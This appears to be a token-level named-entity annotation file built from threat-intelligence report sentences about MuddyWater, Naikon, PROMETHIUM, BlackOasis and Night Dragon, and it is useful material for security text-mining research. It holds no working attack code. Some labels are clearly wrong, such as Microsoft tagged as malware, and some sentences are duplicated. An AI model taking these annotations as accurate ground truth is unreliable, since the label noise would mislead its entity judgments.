+. O + +Targeted O +sectors O +of O +Molerats S-APT +include O +governmental S-IDTY +and O +diplomatic I-IDTY +institutions E-IDTY +, O +including O +embassies S-IDTY +; O +companies O +from O +the O +aerospace S-IDTY +and O +defence B-IDTY +Industries E-IDTY +; O +financial B-IDTY +institutions E-IDTY +; O +journalists S-IDTY +; O +software B-IDTY +developers E-IDTY +. 
O + +The O +Palo B-SECTEAM +Alto I-SECTEAM +Networks I-SECTEAM +Unit I-SECTEAM +42 E-SECTEAM +research O +team O +recently O +came O +across O +a O +series O +of O +malicious B-FILE +files E-FILE +which O +were O +almost O +identical O +to O +those O +targeting O +the O +Saudi B-LOC +Arabian E-LOC +government S-IDTY +previously O +discussed O +by O +MalwareBytes S-SECTEAM +. O + +MuddyWater B-ACT +attacks E-ACT +are O +characterized O +by O +the O +use O +of O +a O +slowly O +evolving O +PowerShell-based B-MAL +first I-MAL +stage I-MAL +backdoor E-MAL +we O +call O +" O +POWERSTATS S-MAL +" O +. O + +When O +we O +looked O +at O +the O +cluster O +of O +activity O +which O +consisted O +of O +what O +appeared O +to O +be O +espionage-focused B-ACT +attacks E-ACT +in O +the O +Middle B-LOC +East E-LOC +, O +we O +were O +somewhat O +confused O +as O +the O +previous O +public O +reporting O +had O +attributed O +these O +attacks O +to O +FIN7 S-APT +. O + +FIN7 S-APT +is O +a O +threat O +actor O +group O +that O +is O +financially O +motivated O +with O +targets O +in O +the O +restaurant S-IDTY +, O +services S-IDTY +and O +financial B-IDTY +sectors E-IDTY +. O + +Following O +the O +trail O +of O +existing O +public O +reporting O +, O +the O +tie O +to O +FIN7 S-APT +is O +essentially O +made O +based O +on O +a O +download O +observed O +from O +a O +MuddyWater B-MAL +C2 E-MAL +, O +of O +a O +non-public B-MAL +tool E-MAL +" O +DNSMessenger S-MAL +" O +. O + +There O +was O +a O +mistake O +in O +the O +original O +Morphisec S-SECTEAM +analysis O +which O +linked O +these O +attacks O +to O +FIN7 S-APT +. O + +The O +DNSMessenger S-MAL +malware S-MAL +is O +a O +shared O +tool O +, O +used O +by O +FIN7 S-APT +, O +MuddyWater S-APT +and O +perhaps O +other O +groups S-APT +. 
O + +In O +September B-TIME +2018 E-TIME +, O +we O +found O +evidence O +of O +Seedworm S-APT +and O +the O +espionage S-ACT +group O +APT28 S-APT +( O +aka O +Swallowtail S-APT +, O +Fancy B-APT +Bear E-APT +) O +, O +on O +a O +computer O +within O +the O +Brazil-based S-LOC +embassy S-IDTY +of O +an O +oil-producing O +nation O +. O + +We O +found O +new O +variants O +of O +the O +Powermud B-MAL +backdoor E-MAL +, O +a O +new O +backdoor O +( O +Backdoor.Powemuddy S-MAL +) O +, O +and O +custom B-MAL +tools E-MAL +for O +stealing O +passwords O +, O +creating O +reverse O +shells O +, O +privilege O +escalation O +, O +and O +the O +use O +of O +the O +native O +Windows S-OS +cabinet O +creation O +tool O +, O +makecab.exe S-FILE +, O +probably O +for O +compressing O +stolen O +data O +to O +be O +uploaded O +. O + +Seedworm S-APT +likely O +functions O +as O +a O +cyber B-ACT +espionage I-ACT +group O +to O +secure O +actionable O +intelligence O +that O +could O +benefit O +their O +sponsor O +'s O +interests O +. O + +During O +the O +operations O +, O +the O +group O +used O +tools O +consistent O +with O +those O +leveraged O +during O +past O +intrusions O +including O +Powermud S-MAL +, O +a O +custom O +tool O +used O +by O +the O +Seedworm B-APT +group E-APT +, O +and O +customized B-MAL +PowerShell E-MAL +, O +LaZagne S-MAL +, O +and O +Crackmapexec B-MAL +scripts E-MAL +. O + +The O +Seedworm B-APT +group E-APT +controls O +its O +Powermud B-MAL +backdoor E-MAL +from O +behind O +a O +proxy O +network O +to O +hide O +the O +ultimate O +command-and-control S-TOOL +( O +C&C S-TOOL +) O +location O +. 
O + +After O +compromising O +a O +system O +, O +typically O +by O +installing O +Powermud S-MAL +or O +Powemuddy S-MAL +, O +Seedworm S-APT +first O +runs O +a O +tool O +that O +steals O +passwords O +saved O +in O +users O +' O +web B-ACT +browsers E-ACT +and O +email S-ACT +, O +demonstrating S-ACT +that O +access O +to O +the O +victim O +'s O +email S-TOOL +, O +social O +media O +, O +and O +chat O +accounts O +is O +one O +of O +their O +likely O +goals O +. O + +Seedworm S-APT +then O +uses O +open-source O +tools O +such O +as O +LaZagne S-MAL +and O +Crackmapexec S-MAL +to O +obtain O +Windows S-OS +authorization O +credentials O +. O + +The O +group O +, O +which O +we O +call O +Seedworm S-APT +( O +aka O +MuddyWater S-APT +) O +, O +has O +been O +operating O +since O +at O +least O +2017 S-TIME +, O +with O +its O +most O +recent O +activity O +observed O +in O +December B-TIME +2018 E-TIME +. O + +The O +Seedworm B-APT +group E-APT +is O +the O +only O +group O +known O +to O +use O +the O +Powermud B-MAL +backdoor E-MAL +. O + +Additionally O +, O +the O +group O +compromised O +organizations O +in O +Europe S-LOC +and O +North B-LOC +America E-LOC +that O +have O +ties O +to O +the O +Middle B-LOC +East E-LOC +. O + +MuddyWater S-APT +is O +an O +Iranian S-LOC +high-profile O +threat O +actor O +that O +'s O +been O +seen O +active O +since O +2017 S-TIME +. O + +Little O +detail O +is O +given O +on O +the O +nature O +of O +how O +the O +connection O +between O +DNSMessenger S-MAL +and O +MuddyWater S-MAL +was O +discovered O +it O +isn't O +possible O +for O +us O +to O +verify O +this O +link O +. O + +Over O +the O +past O +year O +, O +we've O +seen O +the O +group O +extensively O +targeting O +a O +wide O +gamut O +of O +entities O +in O +various O +sectors O +, O +including O +Governments S-IDTY +, O +Academy S-IDTY +, O +Crypto-Currency S-IDTY +, O +Telecommunications S-IDTY +and O +the O +Oil B-IDTY +sectors E-IDTY +. 
O + +Little O +detail O +is O +given O +on O +the O +nature O +of O +how O +the O +connection O +between O +DNSMessenger S-MAL +and O +MuddyWater S-MAL +was O +discovered O +it O +isn't O +possible O +for O +us O +to O +verify O +this O +link O +. O + +Depending O +on O +each O +sample O +, O +the O +content O +of O +document O +is O +either O +a O +fake B-MAL +resume I-MAL +application E-MAL +, O +or O +a O +letter S-MAL +from O +the O +Ministry O +of O +Justice O +in O +Lebanon S-LOC +or O +Saudi B-LOC +Arabia E-LOC +. O + +Analysts O +in O +our O +DeepSight B-SECTEAM +Managed I-SECTEAM +Adversary I-SECTEAM +and I-SECTEAM +Threat I-SECTEAM +Intelligence E-SECTEAM +( O +MATI S-SECTEAM +) O +team O +have O +found O +a O +new O +backdoor O +, O +Backdoor.Powemuddy S-FILE +, O +new O +variants O +of O +Seedworm S-APT +'s O +Powermud B-FILE +backdoor E-FILE +( O +aka O +POWERSTATS S-MAL +) O +, O +a O +GitHub O +repository O +used O +by O +the O +group O +to O +store O +their O +scripts O +, O +as O +well O +as O +several O +post-compromise O +tools O +the O +group O +uses O +to O +exploit S-VULNAME +victims O +once O +they O +have O +established O +a O +foothold O +in O +their O +network O +. O + +From O +January B-TIME +2018 E-TIME +to O +March B-TIME +2018 E-TIME +, O +through O +FireEye B-SECTEAM +'s I-SECTEAM +Dynamic I-SECTEAM +Threat I-SECTEAM +Intelligence E-SECTEAM +, O +we O +observed O +attackers S-APT +leveraging O +the O +latest O +code O +execution O +and O +persistence O +techniques O +to O +distribute O +malicious O +macro-based O +documents O +to O +individuals O +in O +Asia S-LOC +and O +the O +Middle B-LOC +East E-LOC +. O + +MuddyWater S-APT +has O +engaged O +in O +prolific O +spear B-ACT +phishing E-ACT +of O +government E-IDTY +and O +defense B-IDTY +entities E-IDTY +in O +Central S-LOC +and O +Southwest B-LOC +Asia E-LOC +. 
O + +This O +actor S-APT +has O +engaged O +in O +prolific O +spear B-ACT +phishing E-ACT +of O +government E-IDTY +and O +defense B-IDTY +entities E-IDTY +in O +Central S-LOC +and O +Southwest B-LOC +Asia E-LOC +. O + +When O +successfully O +executed O +, O +the O +malicious O +documents O +install O +a O +backdoor S-MAL +we O +track O +as O +POWERSTATS S-MAL +. O + +The O +group O +is O +known O +for O +espionage B-ACT +campaigns E-ACT +in O +the O +Middle B-LOC +East E-LOC +. O + +The O +threat O +group O +in O +this O +recently O +observed O +campaign O +– O +TEMP.Zagros O +– O +weaponized O +their O +malware O +using O +the O +following O +techniques O +. O + +The O +MuddyWater B-ACT +campaign E-ACT +was O +first O +sighted O +in O +2017 S-TIME +when O +it O +targeted O +the O +Saudi S-LOC +government S-IDTY +using O +an O +attack O +involving O +PowerShell B-MAL +scripts E-MAL +deployed O +via O +Microsoft S-MAL +Office B-MAL +Word E-MAL +macro O +. O + +The O +threat O +group O +in O +this O +recently O +observed O +campaign O +a O +TEMP.Zagros O +a O +weaponized O +their O +malware O +using O +the O +following O +techniques O +. O + +Like O +the O +previous O +campaigns S-ACT +, O +these O +samples O +again O +involve O +a O +Microsoft B-TOOL +Word E-TOOL +document O +embedded O +with O +a O +malicious O +macro O +that O +is O +capable O +of O +executing O +PowerShell S-TOOL +( O +PS S-TOOL +) O +scripts O +leading O +to O +a O +backdoor O +payload O +. O + +MuddyWater S-APT +is O +a O +relatively O +new O +APT O +that O +surfaced O +in O +2017 S-TIME +. O + +We O +attribute O +this O +activity O +to O +TEMP.Zagros S-APT +( O +reported O +by O +Palo B-SECTEAM +Alto I-SECTEAM +Networks E-SECTEAM +and O +Trend B-SECTEAM +Micro E-SECTEAM +as O +MuddyWater S-APT +) O +, O +an O +Iran-nexus S-LOC +actor S-APT +that O +has O +been O +active O +since O +at O +least O +May B-TIME +2017 E-TIME +. 
O + +We O +attribute O +this O +activity O +to O +TEMP.Zagros S-APT +( O +reported O +by O +Palo B-SECTEAM +Alto I-SECTEAM +Networks E-SECTEAM +and O +Trend B-SECTEAM +Micro E-SECTEAM +) O +, O +an O +Iran-nexus S-LOC +actor S-APT +that O +has O +been O +active O +since O +at O +least O +May B-TIME +2017 E-TIME +. O + +Entities O +in O +these O +sectors O +are O +often O +" O +enabling O +victims O +" O +as O +telecommunications B-IDTY +providers E-IDTY +or O +IT B-IDTY +services I-IDTY +agencies E-IDTY +and O +vendors O +could O +provide O +Seedworm B-APT +actors E-APT +with O +further O +victims O +to O +compromise O +. O + +The O +group O +mainly O +targets O +the O +telecommunications S-IDTY +and O +IT B-IDTY +services I-IDTY +sectors E-IDTY +. O + +However O +, O +the O +group O +behind O +MuddyWater S-APT +has O +been O +known O +to O +target O +other O +countries O +in O +the O +Middle B-LOC +East E-LOC +, O +Europe S-LOC +and O +the O +US S-LOC +. O + +The O +group O +has O +focused O +mainly O +on O +governmental S-IDTY +targets O +in O +Iraq S-LOC +and O +Saudi B-LOC +Arabia E-LOC +, O +according O +to O +past O +telemetry O +. O + +The O +new O +spear-phishing S-ACT +docs O +used O +by O +MuddyWater S-APT +rely O +on O +social B-IDTY +engineering E-IDTY +to O +persuade O +users O +to O +enable O +macros O +. O + +MuddyWater S-APT +has O +recently O +been O +targeting O +victims O +likely O +from O +Lebanon S-LOC +and O +Oman S-LOC +, O +while O +leveraging O +compromised O +domains O +, O +one O +of O +which O +is O +owned O +by O +an O +Israeli S-LOC +web O +developer O +. O + +As O +MuddyWater S-APT +has O +consistently O +been O +using O +POWERSTATS S-MAL +as O +its O +main O +tool O +, O +they O +are O +relatively O +easy O +to O +distinguish O +from O +other O +actors S-APT +. 
O + +In O +March B-TIME +2018 E-TIME +, O +Trend B-SECTEAM +Micro E-SECTEAM +provided O +a O +detailed O +analysis O +of O +another O +campaign O +that O +bore O +the O +hallmarks O +of O +MuddyWater S-APT +. O + +In O +May B-TIME +2018 E-TIME +, O +Trend B-SECTEAM +Micro E-SECTEAM +found O +a O +new O +sample O +( O +Detected O +as O +W2KM_DLOADR.UHAOEEN S-MAL +) O +that O +may O +be O +related O +to O +this O +campaign O +. O + +In O +May B-TIME +2018 E-TIME +, O +Trend B-SECTEAM +Micro E-SECTEAM +found O +a O +new O +sample O +( O +Detected O +as O +W2KM_DLOADR.UHAOEEN S-MAL +) O +that O +may O +be O +related O +to O +this O +campaign O +. O + +Given O +the O +use O +of O +lure O +documents O +designed O +with O +social B-IDTY +engineering E-IDTY +in O +mind O +, O +it O +is O +likely O +that O +MuddyWater S-APT +use O +phishing S-ACT +or O +spam S-ACT +to O +target O +users O +who O +are O +unaware O +of O +these O +documents O +' O +malicious O +nature O +. O + +We O +recently O +noticed O +the O +group O +behind O +MuddyWater S-APT +that O +appear O +to O +be O +targeting O +government B-IDTY +bodies E-IDTY +, O +military B-IDTY +entities E-IDTY +, O +telcos O +and O +educational B-IDTY +institutions E-IDTY +in O +Jordan S-LOC +, O +Turkey S-LOC +, O +Azerbaijan S-LOC +and O +Pakistan S-LOC +, O +in O +addition O +to O +the O +continuous O +targeting O +of O +Iraq S-LOC +and O +Saudi B-LOC +Arabia E-LOC +, O +other O +victims O +were O +also O +detected O +in O +Mali S-LOC +, O +Austria S-LOC +, O +Russia S-LOC +, O +Iran S-LOC +and O +Bahrain. S-LOC +. O + +Observed O +Seedworm S-APT +victims O +were O +located O +primarily O +in O +Pakistan S-LOC +and O +Turkey S-LOC +, O +but O +also O +in O +Russia S-LOC +, O +Saudi B-LOC +Arabia E-LOC +, O +Afghanistan S-LOC +, O +Jordan S-LOC +, O +and O +elsewhere O +. 
O + +The O +MuddyWaters B-APT +group E-APT +has O +carried O +out O +a O +large O +number O +of O +attacks O +and O +demonstrated O +advanced O +social B-ACT +engineering E-ACT +, O +in O +addition O +to O +the O +active O +development O +of O +attacks O +, O +infrastructure O +and O +the O +use O +of O +new O +methods O +and O +techniques O +. O + +Cisco B-SECTEAM +Talos E-SECTEAM +assesses O +with O +moderate O +confidence O +that O +a O +campaign O +we O +recently O +discovered O +called O +" O +BlackWater O +" O +is O +associated O +with O +suspected O +persistent O +threat B-APT +actor I-APT +MuddyWater E-APT +. O + +In O +this O +latest O +activity O +, O +BlackWater O +first O +added O +an O +obfuscated O +Visual B-TOOL +Basic I-TOOL +for I-TOOL +Applications E-TOOL +( O +VBA S-TOOL +) O +script O +to O +establish O +persistence O +as O +a O +registry O +key O +. O + +Talos S-SECTEAM +has O +uncovered O +documents O +that O +we O +assess O +with O +moderate O +confidence O +are O +associated O +with O +suspected O +persistent O +threat B-APT +actor I-APT +MuddyWater E-APT +. O + +MuddyWater S-APT +has O +been O +active O +since O +at O +least O +November B-TIME +2017 E-TIME +and O +has O +been O +known O +to O +primarily O +target O +entities O +in O +the O +Middle B-LOC +East E-LOC +. O + +Between O +February S-TIME +and O +March B-TIME +2019 E-TIME +, O +probable O +MuddyWater-associated B-MAL +samples E-MAL +indicated O +that O +BlackWater O +established O +persistence O +on O +the O +compromised O +host O +, O +at O +used O +PowerShell B-MAL +commands E-MAL +to O +enumerate O +the O +victim O +'s O +machine O +and O +contained O +the O +IP S-PROT +address O +of O +the O +actor S-APT +'s O +command O +and O +control O +( O +C2 S-TOOL +) O +. O + +Despite O +last O +month O +'s O +report O +on O +aspects O +of O +the O +MuddyWater B-ACT +campaign E-ACT +, O +the O +group O +is O +undeterred O +and O +continues O +to O +perform O +operations O +. 
O + +Based O +on O +these O +observations O +, O +as O +well O +as O +MuddyWater S-APT +'s O +history O +of O +targeting O +Turkey-based S-LOC +entities O +, O +we O +assess O +with O +moderate O +confidence O +that O +this O +campaign O +is O +associated O +with O +the O +MuddyWater S-APT +threat O +actor O +group O +. O + +Our O +recent O +report O +, O +" O +The O +Chronicles O +of O +the O +Hellsing B-APT +APT E-APT +: O +the O +Empire B-MAL +Strikes I-MAL +Back E-MAL +" O +began O +with O +an O +introduction O +to O +the O +Naikon B-APT +APT E-APT +, O +describing O +it O +as O +" O +One O +of O +the O +most O +active O +APTs O +in O +Asia S-LOC +, O +especially O +around O +the O +South B-LOC +China I-LOC +Sea E-LOC +" O +. O + +It O +came O +in O +the O +form O +of O +a O +" O +Tran B-MAL +Duy I-MAL +Linh E-MAL +" O +CVE-2012-0158 S-VULID +exploit S-VULNAME +kit O +document O +MD5 S-ENCR +: O +de8a242af3794a8be921df0cfa51885f61 O +and O +was O +observed O +on O +April B-TIME +10 I-TIME +, I-TIME +2014 E-TIME +. O + +Considering O +the O +volume O +of O +Naikon B-ACT +activity E-ACT +observed O +and O +its O +relentless O +, O +repeated O +attack O +attempts O +, O +such O +a O +confrontation O +was O +worth O +looking O +into O +, O +so O +we O +did O +. O + +The O +attackers S-APT +appeared O +to O +be O +Chinese-speaking S-LOC +and O +targeted O +mainly O +top-level O +government B-IDTY +agencies E-IDTY +and O +civil B-IDTY +and I-IDTY +military I-IDTY +organizations E-IDTY +in O +countries O +such O +as O +the O +Philippines S-LOC +, O +Malaysia S-LOC +, O +Cambodia S-LOC +, O +Indonesia S-LOC +, O +Vietnam S-LOC +, O +Myanmar S-LOC +, O +Singapore S-LOC +, O +Nepal S-LOC +, O +Thailand S-LOC +, O +Laos S-LOC +and O +China S-LOC +. 
O + +The O +oil B-IDTY +and I-IDTY +gas E-IDTY +infrastructure O +nexus O +observed O +in O +connection O +with O +greensky27.vicp.net S-MAL +and O +other O +Unit O +78020 O +( O +Naikon S-APT +) O +infrastructure O +suggests O +targeting O +patterns O +supportive O +of O +the O +PRC S-LOC +'s O +strategic O +interests O +over O +energy B-IDTY +resources E-IDTY +within O +the O +South B-LOC +China I-LOC +Sea E-LOC +and O +Southeast B-LOC +Asia E-LOC +. O + +This O +Naikon S-APT +report O +will O +be O +complemented O +by O +a O +follow-on O +report O +that O +will O +examine O +the O +Naikon S-APT +TTP O +and O +the O +incredible O +volume O +of O +attack B-ACT +activity E-ACT +around O +the O +South B-LOC +China I-LOC +Sea E-LOC +that O +has O +been O +going O +on O +since O +at O +least O +2010 S-TIME +. O + +The O +attackers S-APT +appeared O +to O +be O +Chinese-speaking S-LOC +and O +targeted O +mainly O +top-level O +government B-IDTY +agencies E-IDTY +and O +civil B-IDTY +and I-IDTY +military I-IDTY +organizations E-IDTY +in O +countries O +such O +as O +the O +Philippines S-LOC +, O +Malaysia S-LOC +, O +Cambodia S-LOC +, O +Indonesia S-LOC +, O +Vietnam S-LOC +, O +Myanmar S-LOC +, O +Singapore S-LOC +, O +Nepal S-LOC +. O + +This O +bait B-FILE +document E-FILE +, O +or O +email B-ACT +attachment E-ACT +, O +appears O +to O +be O +a O +standard O +Word S-TOOL +document O +, O +but O +is O +in O +fact O +an O +CVE-2012-0158 S-VULID +exploit S-VULNAME +, O +an O +executable O +with O +a O +double O +extension O +, O +or O +an O +executable O +with O +an O +RTLO O +filename O +, O +so O +it O +can O +execute O +code O +without O +the O +user O +'s O +knowledge O +or O +consent O +. O + +In O +the O +Naikon S-APT +scheme O +, O +a O +C&C B-MAL +server E-MAL +can O +be O +specialized O +XSControl O +software O +running O +on O +the O +host O +machine O +. 
O + +It O +was O +during O +operator O +X O +'s O +network O +monitoring O +that O +the O +attackers S-APT +placed O +Naikon B-MAL +proxies E-MAL +within O +the O +countries O +' O +borders O +, O +to O +cloak O +and O +support O +real-time O +outbound O +connections O +and O +data O +Exfiltration S-ACT +from O +high-profile O +victim O +organizations E-IDTY +. O + +In O +addition O +to O +stealing O +keystrokes O +, O +Naikon S-APT +also O +intercepted O +network B-ACT +traffic E-ACT +. O + +Operator O +X O +also O +took O +advantage O +of O +cultural O +idiosyncrasies O +in O +its O +target O +countries O +, O +for O +example O +, O +the O +regular O +and O +widely O +accepted O +use O +of O +personal O +Gmail O +accounts O +for O +work O +. O + +In O +the O +spring B-TIME +of I-TIME +2014 E-TIME +, O +we O +noticed O +an O +increase O +in O +the O +volume O +of O +attack B-ACT +activity E-ACT +by O +the O +Naikon B-APT +APT E-APT +. O + +In O +particular O +, O +we O +noticed O +that O +the O +Naikon B-APT +group E-APT +was O +spear-phished O +by O +an O +actor S-APT +we O +now O +call O +" O +Hellsing S-APT +" O +. O + +More O +details O +about O +the O +cloak O +and O +dagger O +games O +between O +Naikon S-APT +and O +Hellsing S-APT +can O +be O +found O +in O +our O +blogpost O +: O +" O +The O +Chronicles O +of O +the O +Hellsing B-APT +APT E-APT +: O +The O +Empire B-MAL +Strikes I-MAL +Back E-MAL +" O +. O + +Truvasys S-MAL +has O +been O +involved O +in O +several O +attack B-ACT +campaigns E-ACT +, O +where O +it O +has O +masqueraded O +as O +one O +of O +server O +common O +computer B-IDTY +utilities E-IDTY +, O +including O +WinUtils S-IDTY +, O +TrueCrypt S-IDTY +, O +WinRAR S-IDTY +, O +or O +SanDisk S-IDTY +. O + +PROMETHIUM S-APT +is O +an O +activity O +group O +that O +has O +been O +active O +as O +early O +as O +2012 S-TIME +. 
O + +The O +group O +primarily O +uses O +Truvasys S-MAL +, O +a O +first-stage O +malware O +that O +has O +been O +in O +circulation O +for O +several O +years O +. O + +NEODYMIUM S-APT +is O +an O +activity O +group O +that O +is O +known O +to O +use O +a O +backdoor O +malware O +detected O +by O +Microsoft S-IDTY +as O +Wingbird S-MAL +. O + +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +both O +used O +an O +exploit S-VULNAME +for O +CVE-2016-4117 S-VULID +, O +a O +vulnerability O +in O +Adobe O +Flash S-TOOL +Player O +that O +, O +at O +the O +time O +, O +was O +both O +unknown O +and O +unpatched O +. O + +Data O +about O +Wingbird B-ACT +activity E-ACT +indicate O +that O +it O +is O +typically O +used O +to O +attack O +individual O +computers O +instead O +of O +networks O +. O + +In O +early B-TIME +May I-TIME +2016 E-TIME +, O +both O +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +started O +conducting O +attack B-ACT +campaigns E-ACT +against O +specific B-IDTY +individuals E-IDTY +in O +Europe S-LOC +. O + +Meanwhile O +, O +NEODYMIUM S-APT +used O +well-tailored O +spear-phishing S-ACT +emails S-TOOL +with O +attachments O +that O +delivered O +the O +exploit S-VULNAME +code O +, O +ultimately O +leading O +to O +Wingbird S-MAL +'s O +installation O +on O +victim O +computers O +. O + +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +both O +used O +a O +zero-day S-VULNAME +exploit S-VULNAME +that O +executed O +code O +to O +download O +a O +malicious O +payload O +. O + +Wingbird S-MAL +, O +the O +advanced O +malware O +used O +by O +NEODYMIUM S-APT +, O +has O +several O +behaviors O +that O +trigger O +alerts O +in O +Windows B-SECTEAM +Defender I-SECTEAM +ATP E-SECTEAM +. O + +This O +volume O +chronicles O +two O +activity B-APT +groups E-APT +, O +code-named O +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +, O +both O +of O +which O +target O +individuals O +in O +a O +specific O +LOC O +of O +Europe S-LOC +. 
O + +Although O +most O +malware O +today O +either O +seeks O +monetary O +gain O +or O +conducts O +espionage S-ACT +for O +economic S-IDTY +advantage O +, O +both O +of O +these O +activity B-APT +groups E-APT +appear O +to O +seek O +information O +about O +specific B-IDTY +individuals E-IDTY +. O + +In O +May B-TIME +2016 E-TIME +, O +both O +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +were O +observed O +to O +launch O +attack B-ACT +campaigns E-ACT +. O + +NEODYMIUM S-APT +is O +an O +activity O +group O +that O +, O +like O +PROMETHIUM S-APT +, O +conducted O +an O +attack B-ACT +campaign E-ACT +in O +early B-TIME +May I-TIME +2016 E-TIME +. O + +Data O +about O +Wingbird B-ACT +activity E-ACT +indicates O +that O +it O +is O +typically O +used O +to O +attack O +individuals O +and O +individual O +computers O +instead O +of O +networks O +. O + +NEODYMIUM S-APT +also O +used O +the O +exact O +same O +CVE-2016-4117 S-VULID +exploit S-VULNAME +code O +that O +PROMETHIUM S-APT +used O +, O +prior O +to O +public O +knowledge O +of O +the O +vulnerability O +'s O +existence O +. O + +NEODYMIUM S-APT +used O +a O +backdoor O +detected O +by O +Windows S-OS +Defender O +as O +Wingbird S-MAL +, O +whose O +characteristics O +closely O +match O +FinFisher S-IDTY +, O +a O +government-grade O +commercial O +surveillance O +package O +. O + +In O +May B-TIME +2016 E-TIME +, O +two O +apparently O +unrelated O +activity B-APT +groups E-APT +, O +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +, O +conducted O +attack B-ACT +campaigns E-ACT +in O +Europe S-LOC +that O +used O +the O +same O +zeroday S-VULNAME +exploit S-VULNAME +while O +the O +vulnerability O +was O +publicly O +unknown O +. 
O + +The O +Middle B-LOC +Eastern E-LOC +hacker O +group O +in O +this O +case O +is O +codenamed O +" O +BlackOasis S-APT +" O +Kaspersky S-SECTEAM +found O +the O +group O +was O +exploiting O +a O +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +zero-day S-VULNAME +vulnerability O +( O +CVE-2016-4117 S-VULID +) O +to O +remotely O +deliver O +the O +latest O +version O +of O +" O +FinSpy S-MAL +" O +malware O +, O +according O +to O +a O +new O +blog O +post O +published O +Monday O +. O + +FinSpy S-MAL +, O +a O +final-stage O +payload O +that O +allows O +for O +an O +attacker S-APT +to O +covertly O +learn O +what O +a O +target O +is O +talking O +about O +and O +who O +they O +are O +communicating O +with O +, O +is O +associated O +with O +Gamma B-APT +Group E-APT +— O +which O +goes O +by O +other O +names O +, O +including O +FinFisher S-IDTY +and O +Lench O +IT O +Solutions O +. O + +In O +the O +past O +, O +BlackOasis S-APT +messages O +were O +designed O +to O +appear O +like O +news O +articles O +from O +2016 S-TIME +about O +political S-IDTY +relations O +between O +Angola S-LOC +and O +China S-LOC +. O + +BlackOasis S-APT +in O +recent O +months O +sent O +a O +wave O +of O +phishing B-ACT +emails S-TOOL +. O + +PROMETHIUM S-APT +uses O +a O +unique O +set O +of O +tools O +and O +methods O +to O +perform O +actions O +like O +lateral O +movement O +and O +data O +Exfiltration S-ACT +. O + +Last O +year O +, O +Microsoft S-IDTY +researchers O +described O +Neodymium S-APT +'s O +behavior O +as O +unusual O +: O +" O +unlike O +many O +activity B-APT +groups E-APT +, O +which O +typically O +gather O +information O +for O +monetary O +gain O +or O +economic S-IDTY +espionage O +, O +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +appear O +to O +launch O +campaigns S-ACT +simply O +to O +gather O +information O +about O +certain O +individuals O +. 
O + +The O +discovery O +by O +Kaspersky S-SECTEAM +marks O +at O +least O +the O +fifth O +zero-day S-VULNAME +exploit S-VULNAME +used O +by O +BlackOasis S-APT +and O +exposed O +by O +security O +researchers O +since O +June B-TIME +2015 E-TIME +. O + +Victims O +of O +BlackOasis S-APT +have O +been O +observed O +in O +the O +following O +countries O +: O +Russia S-LOC +, O +Iraq S-LOC +, O +Afghanistan S-LOC +, O +Nigeria S-LOC +, O +Libya S-LOC +, O +Jordan S-LOC +, O +Tunisia S-LOC +, O +Saudi B-LOC +Arabia E-LOC +, O +Iran S-LOC +, O +Netherlands S-LOC +, O +Bahrain S-LOC +, O +United B-LOC +Kingdom E-LOC +and O +Angola S-LOC +. O + +Unlike O +many O +activity B-APT +groups E-APT +, O +which O +typically O +gather O +information O +for O +monetary O +gain O +or O +economic S-IDTY +espionage O +, O +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +appear O +to O +launch O +campaigns S-ACT +simply O +to O +gather O +information O +about O +certain O +individuals O +. O + +A O +cursory O +review O +of O +BlackOasis S-APT +' O +espionage B-ACT +campaign E-ACT +suggests O +there O +is O +some O +overlap O +between O +the O +group O +'s O +actions O +and O +Saudi B-LOC +Arabia E-LOC +'s O +geopolitical S-IDTY +interests O +. O + +Kaspersky S-SECTEAM +'s O +research O +notes O +that O +BlackOasis S-APT +hacked O +into O +computers O +based O +in O +Saudi B-LOC +Arabia E-LOC +. O + +All O +13 O +countries O +where O +Kaspersky S-SECTEAM +reportedly O +observed O +BlackOasis B-ACT +activity E-ACT +are O +connected O +to O +Saudi B-LOC +Arabia E-LOC +in O +one O +of O +three O +ACTs O +: O +economically O +; O +from O +a O +national O +security O +perspective O +; O +or O +due O +to O +established O +policy O +agreements O +. 
O + +The O +Operation B-ACT +Aurora E-ACT +, O +named O +by O +McAfee S-SECTEAM +and O +announced O +in O +January B-TIME +2010 E-TIME +, O +and O +the O +WikiLeaks S-SECTEAM +document O +disclosures O +of O +2010 S-TIME +have O +highlighted O +the O +fact O +that O +external O +and O +internal O +threats O +are O +nearly O +impossible O +to O +prevent O +. O + +These O +attacks O +have O +involved O +social B-IDTY +engineering E-IDTY +, O +spearphishing B-ACT +attacks E-ACT +, O +exploitation O +of O +Microsoft S-IDTY +Windows S-OS +operating O +systems O +vulnerabilities O +, O +Microsoft S-IDTY +Active O +Directory O +compromises O +, O +and O +the O +use O +of O +remote B-MAL +administration I-MAL +tools E-MAL +( O +RATs S-MAL +) O +in O +targeting O +and O +harvesting O +sensitive O +competitive O +proprietary O +operations O +and O +project-financing O +information O +with O +regard O +to O +oil B-IDTY +and I-IDTY +gas E-IDTY +field O +bids O +and O +operations O +. O + +Night B-APT +Dragon E-APT +'s O +attacks O +have O +involved O +social B-IDTY +engineering E-IDTY +, O +spearphishing B-ACT +attacks E-ACT +, O +exploitation O +of O +Microsoft S-IDTY +Windows S-OS +operating O +systems O +vulnerabilities O +, O +Microsoft S-IDTY +Active O +Directory O +compromises O +, O +and O +the O +use O +of O +remote B-MAL +administration I-MAL +tools E-MAL +( O +RATs S-MAL +) O +in O +targeting O +and O +harvesting O +sensitive O +competitive O +proprietary O +operations O +and O +project-financing O +information O +with O +regard O +to O +oil B-IDTY +and I-IDTY +gas E-IDTY +field O +bids O +and O +operations O +. O + +We O +have O +identified O +the O +tools O +, O +techniques O +, O +and O +network B-ACT +activities E-ACT +used O +in O +these O +continuing O +attacks—which O +we O +have O +dubbed O +Night B-APT +Dragon—as E-APT +originating O +primarily O +in O +China S-LOC +. 
